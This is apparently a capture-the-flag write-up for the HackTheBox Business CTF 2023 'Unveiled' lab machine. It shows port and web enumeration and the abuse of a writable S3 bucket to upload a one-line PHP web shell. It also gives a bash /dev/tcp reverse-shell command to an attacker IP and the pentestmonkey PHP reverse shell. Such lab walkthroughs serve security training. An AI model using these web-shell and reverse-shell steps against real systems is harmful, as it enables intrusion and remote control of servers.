HTB-BusinessCTF23-Unveiled

## Information gathering ~~~shell IP=10.129.251.87 ~~~ ### Port enumeration ~~~shell sudo nmap -p- -sSCV --open --min-rate 4000 -n -Pn $IP -oG allPortsS3 ~~~ ~~~ Starting Nmap 7.80 ( https://nmap.org ) at 2023-07-15 23:25 -05 Nmap scan report for 10.129.251.87 Host is up (0.11s latency). Not shown: 61766 closed ports, 3767 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 |_http-server-header: Apache/2.4.41 |_http-title: Travel to Planet Red Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 36.25 seconds ~~~ * 22/tcp ssh OpenSSH 8.2p1 * 80/tcp http Apache httpd 2.4.41 ### Enumeración de rutas web ![](https://hackmd.io/_uploads/By7sOlZ92.png) #### NSE http-enum ~~~shell sudo nmap -p 80 --script=http-enum $IP ~~~ ~~~ Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-16 00:46 EDT Nmap scan report for 10.129.251.87 Host is up (0.11s latency). PORT STATE SERVICE 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 19.38 seconds ~~~ #### wfuzz ~~~shell wfuzz -w /usr/share/SecLists/Discovery/Web-Content/common.txt -u $IP/FUZZ --hc=404 -t 40 ~~~ ~~~ ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.129.251.87/FUZZ Total requests: 4715 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000023: 403 7 L 20 W 199 Ch ".hta" 000000025: 403 7 L 20 W 199 Ch ".htpasswd" 000000024: 403 7 L 20 W 199 Ch ".htaccess" 000002194: 200 158 L 342 W 4372 Ch "index.html" 000003712: 403 7 L 20 W 199 Ch "server-status" Total time: 17.42445 Processed Requests: 4715 Filtered Requests: 4710 Requests/sec.: 270.5966 ~~~ #### whatweb ~~~shell whatweb http://$IP/ ~~~ ~~~ http://10.129.251.87 [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.41], IP[10.129.251.87], Script, Title[Travel to Planet Red] ~~~ #### nikto ~~~shell nikto -url http://$IP/ ~~~ ~~~ - Nikto v2.5.0 --------------------------------------------------------------------------- + Target IP: 10.129.251.87 + Target Hostname: 10.129.251.87 + Target Port: 80 + Start Time: 2023-07-16 00:53:59 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.41 + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/ + No CGI Directories found (use '-C all' to force check all possible dirs) + /: Server may leak inodes via ETags, header found with file /, inode: 1114, size: 60044876bc644, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418 + Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. + OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD . + 8102 requests: 0 error(s) and 5 item(s) reported on remote host + End Time: 2023-07-16 01:11:36 (GMT-4) (1057 seconds) --------------------------------------------------------------------------- + 1 host(s) tested ~~~ #### ZAP ![](https://hackmd.io/_uploads/rJBTslbcn.png) <http://s3.unveiled.htb/unveiled-backups/main.js> ### s3.unveiled.htb en `/etc/hosts` ~~~shell ... 10.129.251.87 s3.unveiled.htb ... ~~~ ![](https://hackmd.io/_uploads/SJDbMb-92.png) ~~~shell $ sudo apt install awscli ~~~ ~~~shell $ aws configure AWS Access Key ID [None]: 0xFR AWS Secret Access Key [None]: 0XFR Default region name [None]: Default output format [None]: ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb ls 2023-07-15 22:38:30 unveiled-backups 2023-07-15 22:38:30 website-assets ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb ls s3://website-assets An error occurred (InvalidClientTokenId) when calling the ListObjectsV2 operation: The security token included in the request is invalid ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb ls s3://unveiled-backups 2023-07-15 22:38:32 4495 index.html 2023-07-15 22:38:32 1107 main.tf ~~~ ~~~shell echo "Test file" > test.txt ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb cp test.txt s3://unveiled-backups/0xFR.txt ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb ls s3://unveiled-backups 2023-07-16 01:59:57 10 0xFR.txt 2023-07-15 22:38:32 4495 index.html 2023-07-15 22:38:32 1107 main.tf ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb cp test.txt s3://website-assets/0xFR.txt upload: ./test.txt to s3://website-assets/0xFR.txt ~~~ ~~~shell $ curl http://10.129.251.87/0xFR.txt Test file ~~~ ~~~php <?php system($_REQUEST["cmd"]); ?> ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb cp cmd.php s3://website-assets/cmd.php upload: ./cmd.php to s3://website-assets/cmd.php ~~~ ~~~shell $ curl http://10.129.251.87/cmd.php?cmd=ls Test file ~~~ ~~~shell curl http://10.129.251.87/cmd.php?cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.22/5000 0>&1' ~~~ ~~~shell wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php ~~~ ~~~php $ip = '10.10.14.22'; // CHANGE THIS $port = 5000; // CHANGE THIS ~~~ ~~~shell $ aws s3 --endpoint-url http://s3.unveiled.htb cp php-reverse-shell.php s3://website-assets/php-reverse-shell.php upload: ./php-reverse-shell.php to s3://website-assets/php-reverse-shell.php ~~~ ~~~shell $ curl http://10.129.251.87/php-reverse-shell.php ~~~ ~~~shell find / -name flag.txt 2>/dev/null /var/www/flag.txt ~~~